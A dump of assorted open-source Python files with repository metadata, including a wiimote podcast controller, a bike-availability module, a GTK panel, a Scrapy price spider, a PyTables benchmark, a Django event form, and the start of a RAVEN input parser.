repo_name (string, length 6-61) | path (string, length 4-230) | copies (string, length 1-3) | size (string, length 4-6) | text (string, length 1.01k-850k) | license (string, 15 classes) | hash (int64, -9,220,477,234,079,998,000 to 9,219,060,020B) | line_mean (float64, 11.6-96.6) | line_max (int64, 32-939) | alpha_frac (float64, 0.26-0.9) | autogenerated (bool, 1 class) | ratio (float64, 1.62-6.1) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
linux-podcasting-hacks/wiimote-recording-control | wiimidi.py | 1 | 5672 | #!/usr/bin/python
import cwiid
import sys
import time
import pypm
from txosc import osc as OSC
from txosc import sync as SYNC
btn_A = 0x0008
btn_one = 0x0002
btn_two = 0x0001
btn_left = 0x0100
btn_right = 0x0200
btn_up = 0x0800
btn_down = 0x0400
btn_minus = 0x0010
btn_plus = 0x1000
btn_home = 0x0080
btn_shoot = 0x0004
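# Added note (not part of the original script): the wiimote reports all buttons
# as one bitmask, so a state of 0x0108 means A (0x0008) and left (0x0100) are
# held at the same time; buttonEvent() below tests each mask with `state & btn`.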
class MIDISender:
def __init__(self,device):
self.midi_out = None
for id in range(pypm.CountDevices()):
interf,name,inp,outp,opened = pypm.GetDeviceInfo(id)
if (outp == 1 and name == device):
self.midi_out = pypm.Output(id,0)
break
if self.midi_out is None:
raise Exception("No output device "+device+" found ...")
def mute(self,channel):
print "muting", channel
for v in range(100,0,-2):
self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
time.sleep(0.001)
def unmute(self,channel):
print "unmuting", channel
for v in range(0,100,2):
self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
time.sleep(0.001)
def play_jingle(self, n):
print "playing jingle", n
self.midi_out.Write([[[0x90,n,127],pypm.Time()]])
time.sleep(0.1)
self.midi_out.Write([[[0x80,n,0],pypm.Time()]])
def stop_jingles(self):
print "stopping jingles"
self.midi_out.Write([[[0xb0,126,127],pypm.Time()]])
time.sleep(0.1)
self.midi_out.Write([[[0xb0,126,0],pypm.Time()]])
# self.midi_out.Write([[[0xb0,channel,0],pypm.Time()]])
class OSCSender:
def __init__(self,host="localhost",port=3819):
self.sender = SYNC.UdpSender(host,port)
def _simple_msg(self,msg):
self.sender.send(OSC.Message(msg))
def add_marker(self):
self._simple_msg("/add_marker")
def rec_prepare(self):
self.sender.send(OSC.Message("/access_action", "Editor/script-action-2"))
def play(self):
self._simple_msg("/transport_play")
def stop(self):
self._simple_msg("/transport_stop")
midi_sender = MIDISender("Midi Through Port-0")
osc_sender = OSCSender()
class WiiButtonState(object):
def __init__(self):
self.button_state = {
btn_A: False,
btn_one: False,
btn_two: False,
btn_left: False,
btn_right: False,
btn_up: False,
btn_down: False,
btn_minus: False,
btn_plus: False,
btn_home: False,
btn_shoot: False
}
self.button_funcs = {}
def callback(self,messages,time):
for msgType, msgContent in messages:
if msgType != cwiid.MESG_BTN:
continue
self.buttonEvent(msgContent)
def buttonEvent(self,state):
for btn,old_state in self.button_state.items():
new_state = state & btn
if new_state != old_state:
self.button_state[btn] = new_state
if btn in self.button_funcs:
press_func, rel_func = self.button_funcs[btn]
if new_state:
press_func()
else:
rel_func()
class MutingWii(WiiButtonState):
def __init__(self,mutingChannel):
super(MutingWii,self).__init__()
self.mutingChannel = mutingChannel
self.button_funcs[btn_shoot] = (self.mute,self.unmute)
def mute(self):
self.device.led = cwiid.LED1_ON
midi_sender.mute(self.mutingChannel)
def unmute(self):
self.device.led = 0
midi_sender.unmute(self.mutingChannel)
class MasterWii(MutingWii):
def __init__(self,mutingChannel):
super(MasterWii,self).__init__(mutingChannel)
self.button_funcs[btn_one] = (self.jingle1_play,self.leds_off)
self.button_funcs[btn_two] = (self.jingle2_play,self.leds_off)
self.button_funcs[btn_home] = (self.rec_prepare,self.leds_off)
self.button_funcs[btn_A] = (self.set_mark,self.leds_off)
self.button_funcs[btn_up] = (self.play,self.leds_off)
self.button_funcs[btn_down] = (self.stop,self.leds_off)
def jingle1_play(self):
print "Jingle1 play"
self.device.led = cwiid.LED2_ON
midi_sender.play_jingle(0)
def jingle2_play(self):
print "Jingle2 play"
self.device.led = cwiid.LED2_ON
midi_sender.play_jingle(1)
def jingles_stop(self):
midi_sender.stop_jingles()
def rec_prepare(self):
print "Recplay"
self.device.led = cwiid.LED3_ON
osc_sender.rec_prepare()
def play(self):
osc_sender.play()
def stop(self):
osc_sender.stop()
def set_mark(self):
print "Set mark"
self.device.led = cwiid.LED4_ON
osc_sender.add_marker()
def leds_off(self):
self.device.led = 0
def do_nothing():
pass
execfile('device_config')
def make_connections(conns):
for id,instance in devices.items():
if id in conns:
continue
print "Connecting", id,
try:
wiimote = cwiid.Wiimote(id)
print "success",
wiimote.rpt_mode = cwiid.RPT_BTN
print "report buttons",
wiimote.mesg_callback = instance.callback
instance.device = wiimote
wiimote.enable(cwiid.FLAG_MESG_IFC)
conns.append(id)
except:
print "failed"
return conns
if __name__ == "__main__":
conns = []
while True:
make_connections(conns)
time.sleep(1)
| bsd-2-clause | 2,697,744,012,294,002,000 | 26.269231 | 81 | 0.565585 | false | 3.25043 | false | false | false |
nojhan/weboob-devel | modules/jcvelaux/module.py | 7 | 5806 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 dud
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.backend import Module, BackendConfig
from weboob.capabilities.base import StringField
from weboob.capabilities.gauge import CapGauge, GaugeSensor, Gauge, GaugeMeasure, SensorNotFound
from weboob.tools.value import Value
from weboob.tools.ordereddict import OrderedDict
from .browser import VelibBrowser
__all__ = ['jcvelauxModule']
SENSOR_TYPES = OrderedDict(((u'available_bikes', u'Available bikes'),
(u'available_bike_stands', u'Free stands'),
(u'bike_stands', u'Total stands')))
CITIES = ("Paris", "Rouen", "Toulouse", "Luxembourg", "Valence", "Stockholm",
"Goteborg", "Santander", "Amiens", "Lillestrom", "Mulhouse", "Lyon",
"Ljubljana", "Seville", "Namur", "Nancy", "Creteil", "Bruxelles-Capitale",
"Cergy-Pontoise", "Vilnius", "Toyama", "Kazan", "Marseille", "Nantes",
"Besancon")
class BikeMeasure(GaugeMeasure):
def __repr__(self):
return '<GaugeMeasure level=%d>' % self.level
class BikeSensor(GaugeSensor):
longitude = StringField('Longitude of the sensor')
latitude = StringField('Latitude of the sensor')
class jcvelauxModule(Module, CapGauge):
NAME = 'jcvelaux'
DESCRIPTION = (u'City bike renting availability information.\nCities: %s' %
u', '.join(CITIES))
MAINTAINER = u'Herve Werner'
EMAIL = '[email protected]'
VERSION = '1.1'
LICENSE = 'AGPLv3'
BROWSER = VelibBrowser
STORAGE = {'boards': {}}
CONFIG = BackendConfig(Value('city', label='City', default='Paris',
choices=CITIES + ("ALL",)))
def __init__(self, *a, **kw):
super(jcvelauxModule, self).__init__(*a, **kw)
self.cities = None
def _make_gauge(self, info):
gauge = Gauge(info['id'])
gauge.name = unicode(info['name'])
gauge.city = unicode(info['city'])
gauge.object = u'bikes'
return gauge
def _make_sensor(self, sensor_type, info, gauge):
id = '%s.%s' % (sensor_type, gauge.id)
sensor = BikeSensor(id)
sensor.gaugeid = gauge.id
sensor.name = SENSOR_TYPES[sensor_type]
sensor.address = unicode(info['address'])
sensor.longitude = info['longitude']
sensor.latitude = info['latitude']
sensor.history = []
return sensor
def _make_measure(self, sensor_type, info):
measure = BikeMeasure()
measure.date = info['last_update']
measure.level = float(info[sensor_type])
return measure
def _parse_gauge(self, info):
gauge = self._make_gauge(info)
gauge.sensors = []
for type in SENSOR_TYPES:
sensor = self._make_sensor(type, info, gauge)
measure = self._make_measure(type, info)
sensor.lastvalue = measure
gauge.sensors.append(sensor)
return gauge
def _contract(self):
contract = self.config.get('city').get()
if contract.lower() == 'all':
contract = None
return contract
def iter_gauges(self, pattern=None):
if pattern is None:
for jgauge in self.browser.get_station_list(contract=self._contract()):
yield self._parse_gauge(jgauge)
else:
lowpattern = pattern.lower()
for jgauge in self.browser.get_station_list(contract=self._contract()):
gauge = self._parse_gauge(jgauge)
if lowpattern in gauge.name.lower() or lowpattern in gauge.city.lower():
yield gauge
def iter_sensors(self, gauge, pattern=None):
if not isinstance(gauge, Gauge):
gauge = self._get_gauge_by_id(gauge)
if gauge is None:
raise SensorNotFound()
if pattern is None:
for sensor in gauge.sensors:
yield sensor
else:
lowpattern = pattern.lower()
for sensor in gauge.sensors:
if lowpattern in sensor.name.lower():
yield sensor
def get_last_measure(self, sensor):
if not isinstance(sensor, GaugeSensor):
sensor = self._get_sensor_by_id(sensor)
if sensor is None:
raise SensorNotFound()
return sensor.lastvalue
def _fetch_cities(self):
if self.cities:
return
self.cities = {}
jcontracts = self.browser.get_contracts_list()
for jcontract in jcontracts:
for city in jcontract['cities']:
self.cities[city.lower()] = jcontract['name']
def _get_gauge_by_id(self, id):
jgauge = self.browser.get_station_infos(id)
if jgauge:
return self._parse_gauge(jgauge)
else:
return None
def _get_sensor_by_id(self, id):
_, gauge_id = id.split('.', 1)
gauge = self._get_gauge_by_id(gauge_id)
if not gauge:
raise SensorNotFound()
for sensor in gauge.sensors:
if sensor.id.lower() == id.lower():
return sensor
| agpl-3.0 | 2,546,773,381,831,487,500 | 32.755814 | 96 | 0.603514 | false | 3.75307 | false | false | false |
ktosiek/spanel | main.py | 1 | 3260 | #!/usr/bin/env python
# Copyright 2012 Tomasz Kontusz
#
# This file is part of Spanel.
#
# Spanel is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Spanel is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Spanel. If not, see <http://www.gnu.org/licenses/>.
import argparse
import logging
import sys
import threading
import gtk
import gobject
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from utils import Enum, GdkLock
# setting DEBUG for pre-main initialization, it will be changed in main()
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
height = 16
Positions = Enum(('TOP', 'BOTTOM'))
class PanelWindow(gtk.Window):
def __init__(self, position=Positions.TOP, widgets=[]):
super(PanelWindow, self).__init__(gtk.WINDOW_TOPLEVEL)
self.set_default_size(gtk.gdk.screen_width(), height)
self.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DOCK)
self._box = gtk.HBox()
self.add(self._box)
self.setup_widgets(widgets)
self.show_all()
for w, _ in widgets: # TODO: create widget protocol
if hasattr(w, 'on_visible'):
w.on_visible()
if position == Positions.TOP:
self.move(0, 0)
self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
gtk.gdk.PROP_MODE_REPLACE, [0, height, 0, 0])
elif position == Positions.BOTTOM:
self.move(0, gtk.gdk.screen_height()-height)
self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
gtk.gdk.PROP_MODE_REPLACE, [0, 0, 0, height])
def setup_widgets(self, widgets):
default_kwargs = {
'expand': False
}
for widget, w_kwargs in widgets:
kwargs = default_kwargs.copy()
kwargs.update(w_kwargs)
self._box.pack_start(widget, **kwargs)
def main():
logger.info('loading configuration')
import conf
debug_levels = ['DEBUG', 'INFO', 'WARNING', 'ERROR']
parser = argparse.ArgumentParser(
description="Simple panel written in Python for holding widgets")
parser.add_argument('--verbosity', '-v', dest='verbosity',
choices=debug_levels, default=None)
args = parser.parse_args()
level = args.verbosity or getattr(conf, 'VERBOSITY', 'INFO')
if level not in debug_levels:
logger.critical('Log level %s not supported!', level)
return 1
logging.basicConfig(level=level)
logger.info('creating panel')
app = PanelWindow(position=getattr(conf, 'POSITION', None),
widgets=getattr(conf, 'WIDGETS', []))
logger.info('starting main loop')
gtk.gdk.threads_init()
with GdkLock():
gtk.main()
if __name__ == '__main__':
main()
| gpl-3.0 | 4,020,006,616,475,242,000 | 30.650485 | 73 | 0.645092 | false | 3.821805 | false | false | false |
jasonzou/MyPapers | libs/citepro/citeproc/formatter/html.py | 1 | 1474 |
from cgi import escape
def preformat(text):
return escape(str(text))
class TagWrapper(str):
tag = None
attributes = None
@classmethod
def _wrap(cls, text):
if cls.attributes:
attrib = ' ' + ' '.join(['{}="{}"'.format(key, value)
for key, value in cls.attributes.items()])
else:
attrib = ''
return '<{tag}{attrib}>{text}</{tag}>'.format(tag=cls.tag,
attrib=attrib,text=text)
def __new__(cls, text):
return super().__new__(cls, cls._wrap(text))
class Italic(TagWrapper):
tag = 'i'
class Oblique(Italic):
pass
class Bold(TagWrapper):
tag = 'b'
class Light(TagWrapper):
tag = 'l'
class Underline(TagWrapper):
tag = 'u'
class Superscript(TagWrapper):
tag = 'sup'
class Subscript(TagWrapper):
tag = 'sub'
class SmallCaps(TagWrapper):
tag = 'span'
attributes = {'style': 'font-variant:small-caps;'}
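# Added illustration (not in the original module) of the markup the wrappers
# above produce via _wrap():
#   Bold('et al.')    -> '<b>et al.</b>'
#   SmallCaps('nasa') -> '<span style="font-variant:small-caps;">nasa</span>'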
class Bibliography(str):
bib_prefix = '<div class="csl-bib-body">'
bib_suffix = '</div>'
item_prefix = ' <div class="csl-entry">'
item_suffix = '</div>'
def __new__(cls, items):
output = [cls.bib_prefix]
for text in items:
text = cls.item_prefix + str(text) + cls.item_suffix
output.append(text)
output.append(cls.bib_suffix)
return super().__new__(cls, '\n'.join(output))
| mit | -1,419,586,216,385,512,400 | 19.760563 | 79 | 0.539349 | false | 3.534772 | false | false | false |
pculture/unisubs | apps/search/templatetags/search_tags.py | 7 | 1935 | # Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from django import template
from django.db.models.query import QuerySet
from django.db.models import Model
from search.forms import SearchForm
from videos.models import Video
register = template.Library()
@register.inclusion_tag('search/_search_form.html', takes_context=True)
def search_form(context, form=None, simple=False):
return {
'simple': simple,
'form': form or SearchForm()
}
@register.simple_tag
def load_related_for_result(search_qs):
#should be fixed in future if result will contain not only Video
from videos.models import SubtitleLanguage
videos = []
for obj in search_qs:
if not obj:
continue
if isinstance(obj, Model):
videos.append((obj.id, obj))
else:
videos.append((obj.object.id, obj.object))
videos = dict(videos)
langs_qs = SubtitleLanguage.objects.select_related('video', 'last_version').filter(video__id__in=videos.keys())
if videos:
for v in videos.values():
v.langs_cache = []
for l in langs_qs:
videos[l.video_id].langs_cache.append(l)
return ''
| agpl-3.0 | 4,795,282,936,675,541,000 | 30.209677 | 115 | 0.685788 | false | 3.924949 | false | false | false |
ddy88958620/lib | Python/scrapy/sagemcom/cometcouk.py | 2 | 4261 | __author__ = 'juraseg'
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request
from product_spiders.items import Product, ProductLoader
import logging
class ComeCoUkSpider(BaseSpider):
name = 'comet.co.uk'
allowed_domains = ['comet.co.uk']
start_urls = (
'http://www.comet.co.uk/',
)
search_url = 'http://www.comet.co.uk/webapp/wcs/stores/servlet/SearchResultsDisplayView?storeId=10151&catalogId=10002&langId=-1&searchTerm='
keywords = ['Sagemcom', 'Sagem']
products = [
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2-Freeview-freesat-Recorder/680052',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2/1TB-Freeview-freesat-Recorder/735736',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-FOXSAT-HDR500-Freeview-freesat-Recorder/712930',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PANASONIC-DMR-HW100EBK-Freeview-freesat-Recorder/767913',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAMSUNG-SMT-S7800-Freeview-freesat-Recorder/701467',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI90-320-Freeview-freesat-Recorder/621994',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-PVR9300T/500-Freeview-freesat-Recorder/787388',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SONY-SVRHDT500B.CEK-Freeview-freesat-Recorder/700665',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI95-320-Freeview-freesat-Recorder/664121',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PHILIPS-HDTP8530-Freeview-freesat-Recorder/600339',
]
def start_requests(self):
for keyword in self.keywords:
url = self.search_url + keyword
request = Request(url, callback=self.parse_search)
yield request
for url in self.products:
yield Request(url, callback=self.parse_product)
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
url = response.url
name = hxs.select("//div[@id='product-content']//div[@id='product-header']/h1//text()").extract()
if not name:
logging.error("ERROR! NO NAME! %s" % url)
return
name = " ".join(name)
price = hxs.select("//div[@id='product-content']//div[@id='productPrice']//p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! %s %s" % (url, name))
return
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
def parse_search(self, response):
hxs = HtmlXPathSelector(response)
# parse pages
pages = hxs.select("//ul[@id='pagination']/li/a/@href").extract()
for page in pages:
request = Request(page, callback=self.parse_search)
yield request
# parse products
items = hxs.select("//div[@class='column_one grid_list']/div")
for item in items:
name = item.select("div/div[@class='info']/div/h2/a/text()").extract()
if not name:
continue
name = name[0]
url = item.select("div/div[@class='info']/div/h2/a/@href").extract()
if not url:
logging.error("ERROR! NO URL! URL: %s. NAME: %s" % (response.url, name))
continue
url = url[0]
price = item.select("div/div[@class='pricebox']/p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! URL: %s. NAME: %s" % (response.url, name))
continue
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
| apache-2.0 | 2,599,687,918,353,932,000 | 41.188119 | 144 | 0.615349 | false | 3.126192 | false | false | false |
atodorov/anaconda | pyanaconda/modules/payloads/source/factory.py | 1 | 1945 | #
# Factory class to create sources.
#
# Copyright (C) 2020 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.modules.payloads.constants import SourceType
__all__ = ["SourceFactory"]
class SourceFactory(object):
"""Factory to create payload sources."""
@staticmethod
def create_source(source_type: SourceType):
"""Create a source module.
:param source_type: a source type
:return: a source module
"""
if source_type == SourceType.LIVE_OS_IMAGE:
from pyanaconda.modules.payloads.source.live_os.live_os import LiveOSSourceModule
return LiveOSSourceModule()
elif source_type == SourceType.CDROM:
from pyanaconda.modules.payloads.source.cdrom.cdrom import CdromSourceModule
return CdromSourceModule()
if source_type == SourceType.HMC:
from pyanaconda.modules.payloads.source.hmc.hmc import HMCSourceModule
return HMCSourceModule()
raise ValueError("Unknown source type: {}".format(source_type))
| gpl-2.0 | -9,087,149,336,753,001,000 | 41.282609 | 93 | 0.720823 | false | 4.182796 | false | false | false |
gdementen/PyTables | bench/optimal-chunksize.py | 13 | 3822 | """Small benchmark on the effect of chunksizes and compression on HDF5 files.
Francesc Alted
2007-11-25
"""
from __future__ import print_function
import os
import math
import subprocess
import tempfile
from time import time
import numpy
import tables
# Size of dataset
# N, M = 512, 2**16 # 256 MB
# N, M = 512, 2**18 # 1 GB
# N, M = 512, 2**19 # 2 GB
N, M = 2000, 1000000 # 15 GB
# N, M = 4000, 1000000 # 30 GB
datom = tables.Float64Atom() # elements are double precision
def quantize(data, least_significant_digit):
"""Quantize data to improve compression.
data is quantized using around(scale*data)/scale, where scale is
2**bits, and bits is determined from the least_significant_digit.
For example, if least_significant_digit=1, bits will be 4.
"""
precision = 10. ** -least_significant_digit
exp = math.log(precision, 10)
if exp < 0:
exp = int(math.floor(exp))
else:
exp = int(math.ceil(exp))
bits = math.ceil(math.log(10. ** -exp, 2))
scale = 2. ** bits
return numpy.around(scale * data) / scale
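# Worked example (added for clarity): least_significant_digit=1 gives
# precision=0.1, exp=-1, bits=ceil(log2(10))=4 and scale=16, so values are
# rounded to multiples of 1/16, e.g. quantize(numpy.array([0.123456]), 1)
# returns array([ 0.125]).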
def get_db_size(filename):
sout = subprocess.Popen("ls -sh %s" % filename, shell=True,
stdout=subprocess.PIPE).stdout
line = [l for l in sout][0]
return line.split()[0]
def bench(chunkshape, filters):
numpy.random.seed(1) # to have reproductible results
filename = tempfile.mktemp(suffix='.h5')
print("Doing test on the file system represented by:", filename)
f = tables.open_file(filename, 'w')
e = f.create_earray(f.root, 'earray', datom, shape=(0, M),
filters = filters,
chunkshape = chunkshape)
# Fill the array
t1 = time()
for i in range(N):
# e.append([numpy.random.rand(M)]) # use this for less compressibility
e.append([quantize(numpy.random.rand(M), 6)])
# os.system("sync")
print("Creation time:", round(time() - t1, 3), end=' ')
filesize = get_db_size(filename)
filesize_bytes = os.stat(filename)[6]
print("\t\tFile size: %d -- (%s)" % (filesize_bytes, filesize))
# Read in sequential mode:
e = f.root.earray
t1 = time()
# Flush everything to disk and flush caches
#os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
for row in e:
t = row
print("Sequential read time:", round(time() - t1, 3), end=' ')
# f.close()
# return
# Read in random mode:
i_index = numpy.random.randint(0, N, 128)
j_index = numpy.random.randint(0, M, 256)
# Flush everything to disk and flush caches
#os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
# Protection against too large chunksizes
# 4 MB
if 0 and filters.complevel and chunkshape[0] * chunkshape[1] * 8 > 2 ** 22:
f.close()
return
t1 = time()
for i in i_index:
for j in j_index:
t = e[i, j]
print("\tRandom read time:", round(time() - t1, 3))
f.close()
# Benchmark with different chunksizes and filters
# for complevel in (0, 1, 3, 6, 9):
for complib in (None, 'zlib', 'lzo', 'blosc'):
# for complib in ('blosc',):
if complib:
filters = tables.Filters(complevel=5, complib=complib)
else:
filters = tables.Filters(complevel=0)
print("8<--" * 20, "\nFilters:", filters, "\n" + "-" * 80)
# for ecs in (11, 14, 17, 20, 21, 22):
for ecs in range(10, 24):
# for ecs in (19,):
chunksize = 2 ** ecs
chunk1 = 1
chunk2 = chunksize / datom.itemsize
if chunk2 > M:
chunk1 = chunk2 / M
chunk2 = M
chunkshape = (chunk1, chunk2)
cs_str = str(chunksize / 1024) + " KB"
print("***** Chunksize:", cs_str, "/ Chunkshape:", chunkshape, "*****")
bench(chunkshape, filters)
| bsd-3-clause | -8,520,421,271,985,768,000 | 29.333333 | 79 | 0.591575 | false | 3.300518 | false | false | false |
platinummonkey/Vizwall-Website | vizwall/events/forms.py | 1 | 5287 | from django.forms import *
from django.forms.widgets import *
from django.forms.extras.widgets import *
from vizwall.events.models import Event, COMPONENT_CHOICES, dTimeFieldInputs
import datetime
from vizwall.accounts.models import UserProfile
from captcha.fields import CaptchaField
class EventForm(ModelForm):
'''Event form, customized to show normal Anonymous view'''
event_date = DateTimeField(required=True, initial=None, input_formats=dTimeFieldInputs, help_text='Please use the date selector and check the calendar for available times!')
captcha = CaptchaField()
class Meta:
model = Event
#fields = ()
exclude=('event_last_modified', 'event_req_date',
'event_pub_date', 'event_is_published', 'event_assigned_proctors',
'event_is_declined')
widgets = {
'event_detail': Textarea(attrs={'cols':35, 'rows': 5}),
'event_components_vizwall': CheckboxInput(),
'event_components_3dtv': CheckboxInput(),
'event_components_omni': CheckboxInput(),
'event_components_hd2': CheckboxInput(),
'event_components_smart': CheckboxInput(),
}
def __init__(self, *args, **kwargs):
self.event_id = kwargs.pop('event_id') if kwargs.get('event_id') else None
super(EventForm, self).__init__(*args, **kwargs)
def clean_event_component_vizwall(self):
if self.cleaned_data['event_component_vizwall']:
return True
return False
def clean_event_component_omni(self):
if self.cleaned_data['event_component_omni']:
return True
return False
def clean_event_component_3dtv(self):
if self.cleaned_data['event_component_3dtv']:
return True
return False
def clean_event_component_hd2(self):
if self.cleaned_data['event_component_hd2']:
return True
return False
def clean_event_component_smart(self):
if self.cleaned_data['event_component_smart']:
return True
return False
def clean_event_date(self):
''' Checks requested date against any current events for conflicts;
raises an error if another published event exists, else passes validation'''
reqDate = self.cleaned_data['event_date']
reqDuration = self.cleaned_data['event_duration']
conflict = self.checkConflict(reqDate, reqDuration)
if conflict and conflict.pk != self.event_id:
raise forms.ValidationError("This event Conflicts with another event: \"%s\" between %s-%s - ID# %s" % ('\n'+conflict.event_title, conflict.event_date.strftime('%H:%M'), conflict.get_end_date().strftime('%H:%M'), conflict.pk))
# always return the cleaned data, whether it was changed or not
return reqDate
def inRange(self,begin,duration,eventStart,eventDuration):
''' Checks if date ranges overlap - pads 1 minute off end times'''
end = begin + datetime.timedelta(minutes=duration-1)
eventEnd = eventStart + datetime.timedelta(minutes=int(eventDuration)-1)
#print begin, end
#print eventStart, eventEnd
isInRange = begin <= eventStart <= end or begin <= eventEnd <= end
return isInRange
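# Illustrative example (added, values hypothetical): a 60-minute request at
# 10:00 spans 10:00-10:59, so an existing 60-minute event starting at 10:30
# (spanning 10:30-11:29) falls inside that window and inRange() returns True.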
def checkConflict(self, reqDate, reqDuration):
'''checks current scheduled and published events if there is a conflict '''
tom = reqDate+datetime.timedelta(days=2) # make sure full day tomorrow is included
if self.event_id:
print "event_id given"
daysEvents = Event.objects.all().filter(
event_date__gte=datetime.date(reqDate.year,reqDate.month,reqDate.day),
event_date__lte=datetime.date(tom.year,tom.month,tom.day),
event_is_published=True).exclude(pk=self.event_id)
print daysEvents
else:
print "event_id not given"
daysEvents = Event.objects.all().filter(
event_date__gte=datetime.date(reqDate.year,reqDate.month,reqDate.day),
event_date__lte=datetime.date(tom.year,tom.month,tom.day),
event_is_published=True)
if daysEvents:
for event in daysEvents:
if self.inRange(event.event_date, event.event_duration, reqDate, reqDuration):
# conflict exists, return with conflicting event (~bool True)
return event
# no conflicts, valid event time, return with nothing (~bool False)
return False
class DynamicMultipleChoiceField(MultipleChoiceField):
''' Removes default django validation that values are in choices option '''
def validate(self, value):
if self.required and not value:
raise forms.ValidationError(self.error_messages['required'])
class EventFormAdmin(EventForm):
class Meta:
model=Event
exclude=('event_pub_date', 'event_req_date', 'event_last_modified', 'event_assigned_proctors', 'captcha')
widgets = {
'event_detail': Textarea(attrs={'cols':35, 'rows':5}),
'event_components_vizwall': CheckboxInput(),
'event_components_3dtv': CheckboxInput(),
'event_components_omni': CheckboxInput(),
'event_components_hd2': CheckboxInput(),
'event_components_smart': CheckboxInput(),
'event_is_published': CheckboxInput(),
'event_is_declined': CheckboxInput(),
}
# representing the manytomany related field in Event
proctors = DynamicMultipleChoiceField(required=False)
def clean_proctors(self):
return self.cleaned_data['proctors']
| gpl-3.0 | -4,722,789,321,356,158,000 | 40.960317 | 232 | 0.687535 | false | 3.861943 | false | false | false |
idaholab/raven | framework/CodeInterfaces/Generic/GenericParser.py | 2 | 10797 | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Mar 10, 2015
@author: talbpaul
"""
from __future__ import division, print_function, unicode_literals, absolute_import
import os
import sys
import numpy as np
from utils import mathUtils
# numpy with version 1.14.0 and upper will change the floating point type and print
# https://docs.scipy.org/doc/numpy-1.14.0/release.html
if int(np.__version__.split('.')[1]) > 13:
np.set_printoptions(**{'legacy':'1.13'})
def _reprIfFloat(value):
"""
Uses repr if the value is a float
@ In, value, any, the value to convert to a string
@ Out, _reprIfFloat, string, a string conversion of this
"""
if mathUtils.isAFloat(value):
return repr(value)
else:
return str(value)
class GenericParser():
"""
import the user-edited input file, build list of strings with replaceable parts
"""
def __init__(self,inputFiles,prefix='$RAVEN-',postfix='$',defaultDelim=':', formatDelim='|'):
"""
